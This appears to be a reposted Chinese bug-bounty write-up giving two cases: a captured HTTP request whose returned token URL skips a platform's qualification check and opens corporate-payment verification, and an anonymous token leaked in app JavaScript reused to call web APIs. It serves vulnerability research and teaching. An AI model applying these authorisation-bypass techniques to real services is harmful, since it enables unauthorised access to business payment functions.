No.0
前言
挖洞就是要多思考,要是没有权限我们需要如何突破限制进行测试
,我是
No.2
案例一
首先登录XXXX平台
然后找到以下接口。
GET /user/credit?company=111111 HTTP/1.1Host: nXXXXCookie: XXXXXSec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9If-Modified-Since: Tue, 02 Jul 2024 10:44:17 GMTPriority: u=0, iConnection: keep-alive
返回包:
HTTP/1.1 200 OKConnection: keep-aliveContent-Type: application/json;charset=UTF-8Date: Fri, 16 Aug 2024 09:50:07 GMTX-B3-Spanid: 663d4f5fb8605800X-B3-Traceid: eb7f16085bb411ef96336f37270dcc88Content-Length: 375{"code":200,"message":"success","data":"https://xxxxxx/trust/vmagic/bacct-service?appid=11&dimid=1001683651&token=jBpHCy8CWzqksLDpKjX4GAUNUSoasO8ZChWIiG8Lrnyt6tBreLiZi6bBqvNc-imcXz5rXdDg.&theme=bluemode"}直接访问该链接。https://xxxxxxx/rust/vmagic/bacct-service?appid=11&dimid=1001683651&token=jimcXz5rXdDg.&theme=bluemode
可直接访问对公打款认证
填了下信息并提交,显示待打款状态,提交成功。
而正常的流程是这样的。
首先进入认证。
https://xxxxx/uauth/login
进入后台需要经过资质认证才能进行对公打款认证。这样的话,就可以绕过资质认证,直接进入打款认证。
No.3
案例二
Web无账号,不能查看后台接口
此时app的js刚好泄露了匿名token
我们把匿名token拼接在web接口上
如果没有token,是提示401的
学员投稿
No.4
原文始发于微信公众号(隐雾安全):Src实战案例分享
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论